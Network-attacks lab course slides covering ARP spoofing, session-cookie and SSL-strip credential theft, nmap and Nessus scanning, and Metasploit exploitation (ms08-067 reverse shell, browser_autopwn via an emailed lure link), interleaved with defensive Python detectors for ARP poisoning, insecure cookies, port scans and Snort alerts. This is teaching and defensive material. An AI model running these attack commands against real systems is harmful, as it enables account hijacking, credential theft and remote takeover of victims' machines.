Agenda
1. Interception of network traffic transmitted using a clear-text protocol (HTTP) => obtaining session cookies => using session cookies to enter a victim's web session
2. Scanning the Windows VM using nmap (+Snort disabled/enabled)
3. Scanning the Windows VM using Nessus (+Snort disabled/enabled)
4. Gaining access to the Windows VM by exploiting a network service vulnerability
5. Gaining access to a Windows machine with a client-side attack: => social engineering => exploit browser vulnerability => use Metasploit to own the machine
Network Attacks
Rules
It is forbidden:
- Any scanning / attack outside the laboratory network
- Any scanning / attack against your colleagues' machines or against the instructor's machine
Administrative tasks
Connect to ftp://stud@my.laptop.ip
username: stud
password: stud
Download:
- Course slides
- VMWare Player: VMware-player-3.1.3.exe
- Windows VM: winxpsp2_web_snort.zip
- Backtrack VM: bt4-final-vm.zip
Exercise 1
Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail account.
- The victim needs a valid Yahoo mail account (a test account)
- The victim will open a web mail session
- The attacker:
  1. Becomes MITM
  2. Captures network traffic of the victim and extracts the necessary data
Exercise 1 cont.
Attacker machine: Become MITM and intercept all traffic sent by the Victim to the Gateway. View the traffic using Wireshark.
1. Find the IP addresses of Victim and Gateway
2. Activate the routing process in Backtrack:
   echo 1 > /proc/sys/net/ipv4/ip_forward
3. Inform the Victim that the Gateway's MAC address is your (attacker) MAC address (ARP poisoning using ARP replies):
   arpspoof -i eth0 -t IP_Victim IP_Gateway
4. View the traffic using Wireshark
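The poisoning in step 3 is not invisible: every forged reply contradicts the gateway's real IP-to-MAC binding, and the same MAC ends up claiming two IPs. The following passive detector (an added example, not part of the course slides or of any tool named on them) applies both checks to a constructed list of ARP replies; the addresses, MACs and the static gateway table are made up for the example.

```python
"""Detect the ARP-reply poisoning used in step 3 (added example, not from the
slides).  The attacker rebinds the gateway's IP to their own MAC by sending
unsolicited ARP replies; a passive monitor on the same segment sees this as
(a) a trusted IP->MAC binding being contradicted and (b) one MAC claiming
more than one IP.  The capture below is constructed, not a real trace."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float         # seconds since capture start
    sender_ip: str    # IP the reply claims to speak for
    sender_mac: str   # MAC it binds that IP to


# Constructed capture: the real gateway 192.168.8.1 answers from aa:...:01,
# then the host at cc:...:50 starts claiming the gateway's IP as well.
SAMPLE = [
    ArpReply(0.0, "192.168.8.1", "aa:aa:aa:aa:aa:01"),
    ArpReply(0.5, "192.168.8.50", "cc:cc:cc:cc:cc:50"),
    ArpReply(1.0, "192.168.8.1", "cc:cc:cc:cc:cc:50"),
    ArpReply(1.5, "192.168.8.1", "cc:cc:cc:cc:cc:50"),
]

# Static table a defender would maintain for hosts that must never move
# (constructed value for this example).
GATEWAY_BINDING = {"192.168.8.1": "aa:aa:aa:aa:aa:01"}


def detect_arp_poisoning(replies, trusted=None):
    """Return alert strings for a time-ordered list of ArpReply.

    trusted: optional IP->MAC table; a reply contradicting it is never
    accepted, so every repeated poisoned reply raises an alert again.
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    binding = dict(trusted)                 # ip -> mac we currently believe
    ips_per_mac = defaultdict(set)          # mac -> IPs it has claimed
    alerts = []
    for r in replies:
        mac = r.sender_mac.lower()
        known = binding.get(r.sender_ip)
        if known is None:
            binding[r.sender_ip] = mac      # first time we hear of this IP
        elif known != mac:
            if r.sender_ip in trusted:
                alerts.append(f"{r.ts:.1f}s TRUSTED-BINDING-VIOLATION: "
                              f"{r.sender_ip} is {known}, reply claims {mac}")
            else:
                alerts.append(f"{r.ts:.1f}s BINDING-CHANGE: "
                              f"{r.sender_ip} moved {known} -> {mac}")
                binding[r.sender_ip] = mac  # untrusted hosts may legitimately move
        new_ip = r.sender_ip not in ips_per_mac[mac]
        ips_per_mac[mac].add(r.sender_ip)
        if new_ip and len(ips_per_mac[mac]) > 1:
            alerts.append(f"{r.ts:.1f}s MULTI-IP: {mac} now claims "
                          + ", ".join(sorted(ips_per_mac[mac])))
    return alerts


if __name__ == "__main__":
    for a in detect_arp_poisoning(SAMPLE, GATEWAY_BINDING):
        print(a)
```

Repeated alerts for the same binding are expected rather than a bug: the poisoning has to be re-sent periodically to keep the victim's cache overwritten, so the repetition is itself the signal. The corresponding preventions are a static ARP entry for the gateway on critical hosts and Dynamic ARP Inspection on managed switches.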
Exercise 1 cont.
1. Find the session cookies of Victim and use them to enter his email session. Wireshark -> Follow TCP stream on a TCP packet sent by Victim
2. Copy the cookies Y and T in a text file
3. Install the Firefox plugin Add N Edit Cookies
4. Open a Yahoo mail session of your own (attacker)
5. Use the plugin to edit your cookies and replace Y and T with the ones of the Victim
6. Refresh the web page
Exercise 2
Intercept network traffic during an HTTPS session. Find the username and password of the Victim.
1. Make yourself MITM (see exercise 1)
2. Start SSLSTRIP and make it listen on port 1234:
   sslstrip -l 1234 -s -w traffic.log
   More details here: http://www.thoughtcrime.org/software/sslstrip/
3.
4. The victim accesses a web site using HTTPS (ex. Yahoo login)
5. Extract the useful information from the file traffic.log
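Exercises 1 and 2 both depend on decisions made by the server: a session cookie without the Secure attribute is sent on any clear-text HTTP request and can be read off the wire, and without Strict-Transport-Security a browser that is steered to http:// first will stay on plaintext for the whole session. The audit below is an added example (not from the slides); the response heads are constructed, the domain is a placeholder, and the cookie names Y and T are taken from Exercise 1.

```python
"""Check a server's HTTP response head for the two weaknesses that make
Exercises 1 and 2 work (added example, not from the slides): session cookies
sent over clear-text HTTP (no Secure attribute) and a site a browser will talk
to over http:// (no Strict-Transport-Security).  The responses below are
constructed; "Y" and "T" are the cookie names Exercise 1 uses."""
import re

ONE_YEAR = 365 * 24 * 3600

# Constructed response heads (not captured from any real server).
WEAK = """HTTP/1.1 200 OK
Set-Cookie: Y=v=1&n=example; path=/; domain=.example.test
Set-Cookie: T=z=example; path=/; domain=.example.test
Content-Type: text/html
"""

SHORT_HSTS = """HTTP/1.1 200 OK
Strict-Transport-Security: max-age=300
Set-Cookie: Y=v=1&n=example; path=/; domain=.example.test; Secure; HttpOnly
Set-Cookie: T=z=example; path=/; domain=.example.test; Secure; HttpOnly
Content-Type: text/html
"""

HARDENED = """HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: Y=v=1&n=example; path=/; domain=.example.test; Secure; HttpOnly
Set-Cookie: T=z=example; path=/; domain=.example.test; Secure; HttpOnly
Content-Type: text/html
"""


def parse_response_head(raw):
    """Split a raw response head into (status line, [(name_lower, value), ...])."""
    lines = raw.strip().splitlines()
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break                       # blank line ends the head
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_response(raw, session_cookie_names=("Y", "T")):
    """Return a list of findings; an empty list means both checks passed."""
    _, headers = parse_response_head(raw)
    findings = []

    hsts = next((v for n, v in headers if n == "strict-transport-security"), None)
    if hsts is None:
        findings.append("missing Strict-Transport-Security: a browser that is sent to "
                        "http:// first can be kept on plaintext by an MITM (the sslstrip case)")
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.IGNORECASE)
        age = int(m.group(1)) if m else 0
        if age < ONE_YEAR:
            findings.append(f"Strict-Transport-Security max-age={age} is below one year; "
                            "the HTTPS-only policy lapses quickly between visits")

    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if cookie in session_cookie_names and "secure" not in attrs:
            findings.append(f"session cookie {cookie} lacks Secure: the browser also sends it "
                            "on clear-text HTTP requests, where it can be read off the wire")
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK), ("short HSTS", SHORT_HSTS), ("hardened", HARDENED)):
        print(label, "->", audit_response(raw) or ["ok"])
```

The HSTS check only helps on the second and later visits (the first request can still arrive over HTTP), which is why the Secure attribute on the session cookies is checked independently: with it set, even a session that was downgraded never exposes Y and T in clear text.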
About Snort
http://www.snort.org/assets/166/snort_manual.pdf
- Portable (Linux, Windows, MacOS X, Solaris, BSD, HP-UX, etc)
- Multiple mechanisms for intrusion detection:
  - Signatures (rules): www.bleedingsnort.com
  - Statistic anomalies
  - Protocol anomalies
Alerts/Logs
Nmap briefings
- TCP connect() scan: nmap -sT <IP Address>
- TCP SYN scan: nmap -sS <IP Address>
- UDP scan: nmap -sU <IP Address>
- Ping scan: nmap -sP <IP Address>
- TCP FIN / Xmas Tree / Null scan: nmap -sF / -sX / -sN <IP Address>
- Version Detection: nmap -sS -sV <IP Address>
- OS Fingerprinting: nmap -sS -O <IP Address>
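Each TCP scan type above has a recognisable flag signature on the wire, and what separates a scan from normal traffic is one source touching many distinct ports of a host in a short time. The detector below is an added example (not from the slides, and not how nmap or Snort is implemented); it classifies constructed packet records by flags and applies a sliding-window port-count threshold. UDP and ping scans carry no TCP flags and are out of its scope. All addresses, ports and timings are made up.

```python
"""Recognise the probe types behind the nmap scans listed above from raw TCP
flags (added example, not from the slides).  On the wire a -sT or -sS probe is
a bare SYN, -sF a bare FIN, -sX (Xmas) FIN+PSH+URG and -sN (Null) no flags;
what turns single probes into a scan is one source touching many distinct
ports of a host in a short window.  The capture is constructed."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class TcpPkt:
    ts: float          # seconds since capture start
    src: str
    dst: str
    dport: int
    flags: frozenset   # subset of {"SYN", "ACK", "FIN", "PSH", "URG", "RST"}


def classify_probe(flags):
    """Map a flag set to a probe type, or None for ordinary traffic."""
    f = set(flags)
    if not f:
        return "NULL"                    # nmap -sN
    if f == {"FIN"}:
        return "FIN"                     # nmap -sF
    if f == {"FIN", "PSH", "URG"}:
        return "XMAS"                    # nmap -sX
    if f == {"SYN"}:
        return "SYN"                     # nmap -sS, and the opening of -sT
    return None                          # SYN/ACK, ACK, data, RST ...


def detect_port_scans(pkts, min_ports=10, window=5.0):
    """Return {src: {(dst, probe_type): max_distinct_ports}} for sources that
    probe at least min_ports distinct ports of one host within `window` s."""
    probes = defaultdict(list)           # (src, dst, type) -> [(ts, dport)]
    for p in sorted(pkts, key=lambda x: x.ts):
        kind = classify_probe(p.flags)
        if kind:
            probes[(p.src, p.dst, kind)].append((p.ts, p.dport))
    hits = {}
    for (src, dst, kind), events in probes.items():
        best = 0
        for t0, _ in events:             # slide a window starting at each probe
            in_window = {port for ts, port in events if t0 <= ts <= t0 + window}
            best = max(best, len(in_window))
        if best >= min_ports:
            hits.setdefault(src, {})[(dst, kind)] = best
    return hits


def constructed_capture():
    """Constructed packets: one scanning host, one ordinary web client."""
    scanner, victim, client = "192.168.8.50", "192.168.8.10", "192.168.8.20"
    pkts = []
    # -sS style sweep: a bare SYN to each of 24 ports within 2.4 s
    for i, port in enumerate(range(1, 25)):
        pkts.append(TcpPkt(i * 0.1, scanner, victim, port, frozenset({"SYN"})))
    # -sX style: FIN+PSH+URG to 16 ports
    for i, port in enumerate(range(135, 151)):
        pkts.append(TcpPkt(10 + i * 0.1, scanner, victim, port,
                           frozenset({"FIN", "PSH", "URG"})))
    # four Null probes: real, but too few to cross the threshold
    for i, port in enumerate((21, 22, 23, 25)):
        pkts.append(TcpPkt(20 + i, scanner, victim, port, frozenset()))
    # legitimate client: three handshakes with the web server, same port each time
    for i in range(3):
        t = 30 + 2.0 * i
        pkts += [TcpPkt(t, client, victim, 80, frozenset({"SYN"})),
                 TcpPkt(t + 0.01, victim, client, 51000 + i, frozenset({"SYN", "ACK"})),
                 TcpPkt(t + 0.02, client, victim, 80, frozenset({"ACK", "PSH"}))]
    return pkts


if __name__ == "__main__":
    for src, kinds in detect_port_scans(constructed_capture()).items():
        for (dst, kind), n in kinds.items():
            print(f"{src} -> {dst}: {kind} probes to {n} distinct ports")
```

The threshold and window are the tuning knobs: too low and a busy client that opens many connections looks like a scanner, too high and a slow scan spread over minutes slips under it. Snort's sfportscan preprocessor, which the next exercises switch on, works on the same principle with its own sensitivity levels.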
Change setup
Start the Windows VM
New attack direction: Backtrack -> Windows VM
Exercise 3
Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).
Obtain the following information (from a single scan):
- Live hosts
- Open TCP ports
- Service version
- Operating system
- Save all output in a text file
Hints:
nmap -h
man nmap
Exercise 3 cont.
Check if the scanning can be detected by a NIDS (Snort)
- Authenticate to the Windows VM (password: user)
- Start Snort:
  cmd.exe -> cd c:\snort\bin
  snort.exe -d -l ..\log -c ..\etc\snort.conf -A console
- Perform the scanning again using Nmap
- Any alert? (see c:\Snort\log\alert.ids)
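Answering "Any alert?" by eye works for one scan; for a full subnet scan the alert file fills quickly, and the useful questions are which source produced the alerts and which signatures fired. The parser below is an added example (not from the slides) for Snort's fast alert format, which is what `-A console` prints and what the Windows build writes to alert.ids. The alert lines are constructed, not captured from the lab VM; GID 122 is the sfportscan preprocessor, while the 1:1000001 and 1:1000002 rules are placeholders in the local-rule SID range.

```python
"""Parse and summarise Snort's fast-format alerts, which is what `-A console`
prints and what the Windows build writes to alert.ids (added example, not from
the slides).  Each record is one line:
  MM/DD-hh:mm:ss.uuuuuu  [**] [gid:sid:rev] msg [**] [Classification: ...]
  [Priority: n] {PROTO} src[:port] -> dst[:port]
The lines below are constructed, not output of the lab's Snort."""
import re
from collections import Counter

ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"     # absent for preprocessor alerts
    r"\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Constructed alert.ids content.  GID 122 is the sfportscan preprocessor; the
# 1:1000001/1000002 rules are placeholders in the local-rule SID range.
SAMPLE_ALERTS = """\
04/12-14:03:22.118305  [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} 192.168.8.50 -> 192.168.8.10
04/12-14:03:22.903311  [**] [122:3:0] (portscan) TCP Portsweep [**] [Priority: 3] {PROTO:255} 192.168.8.50 -> 192.168.8.10
04/12-14:03:25.001002  [**] [1:1000001:1] LOCAL nmap version probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.8.50:41234 -> 192.168.8.10:80
04/12-14:05:10.551000  [**] [1:1000001:1] LOCAL nmap version probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.8.50:41235 -> 192.168.8.10:135
04/12-14:09:41.000123  [**] [1:1000002:1] LOCAL ICMP echo sweep [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.8.77 -> 192.168.8.10
this line is not an alert and is skipped
"""


def parse_alerts(text):
    """Return one dict per well-formed alert line; other lines are skipped."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["prio"] = int(rec["prio"])
            alerts.append(rec)
    return alerts


def summarize(alerts):
    """Counts per source IP and per signature (gid, sid, msg)."""
    by_src = Counter(a["src"] for a in alerts)
    by_sig = Counter((a["gid"], a["sid"], a["msg"]) for a in alerts)
    return by_src, by_sig


def noisy_sources(alerts, threshold=3):
    """Sources with at least `threshold` alerts: the scanner stands out."""
    by_src, _ = summarize(alerts)
    return sorted(src for src, n in by_src.items() if n >= threshold)


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)
    by_src, by_sig = summarize(alerts)
    print("alerts per source:", dict(by_src))
    for (gid, sid, msg), n in by_sig.most_common():
        print(f"  [{gid}:{sid}] {msg}: {n}")
    print("noisy sources:", noisy_sources(alerts))
```

Preprocessor alerts (GID 122) carry no classification and no ports, so the regex keeps both optional; a parser that assumes the full rule-alert shape silently drops exactly the portscan alerts this exercise is looking for.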
Exercise 4
Scan the victim machine using Nessus to find vulnerabilities
1. First install Nessus on BackTrack: Download Nessus (for Ubuntu 9.10 32 bit) from http://www.tenable.com
   dpkg -i Nessus-4.4.1-ubuntu910_i386.deb
2. Then obtain a Nessus activation code (Home Feed): http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed
3. Configure Nessus server:
   - Add a Nessus user: /opt/nessus/sbin/nessus-adduser
   - Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE
   - Start Nessus server: /etc/init.d/nessusd start
4. Start Nessus client: https://127.0.0.1:8834
Exercise 4 cont.
Sample vulnerability:
About Metasploit
Framework for writing and executing exploits
- Modules: Exploits, Auxiliary, Payloads, Encoders, Nops
- User interfaces:
  - console: msfconsole
  - GUI: msfgui
- Updates:
Select Exploit -> Configure options + payload -> Run exploit -> Execute payload
Tutorial: http://www.offensive-security.com/metasploit-unleashed
Exercise 5
We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to the Victim machine
1. cd /pentest/exploits/framework3
2. ./msfconsole
3. help
4. search ms08-067
5. use exploit/windows/smb/ms08_067_netapi
6. show options, show payloads
7. set RHOST, LHOST, PAYLOAD, TARGET = 3, etc (for payload use windows/shell/reverse_tcp)
8. exploit
9. Execute windows commands in the obtained shell (ex. ipconfig, hostname)
Exercise 5 cont.
Obtain Remote Desktop access to the Victim machine:
Add a new user:
What if?
- Victim has all ports closed (firewall)
- Operating system is patched
Answer: Attack client applications and plugins (web browser, Acrobat Reader, MS Office, etc)
Change setup
- Start the firewall of the Windows VM
- Disable any exceptions
- Use nmap to verify that there are no more open ports
Exercise 6
Exploit a browser vulnerability to gain remote access. Use Metasploit and browser autopwn.
1. cd /pentest/exploits/framework3
2. ./msfconsole
3. use auxiliary/server/browser_autopwn
4. set LHOST 192.168.x.x (attacker IP)
5. set SRVPORT 80
6. set URIPATH mypictures.html
7. exploit
Exercise 6 cont.
- Send the victim an email containing the link: http://192.168.x.x/mypictures.html
- Victim clicks the link
- Attacker obtains a meterpreter session
Q&A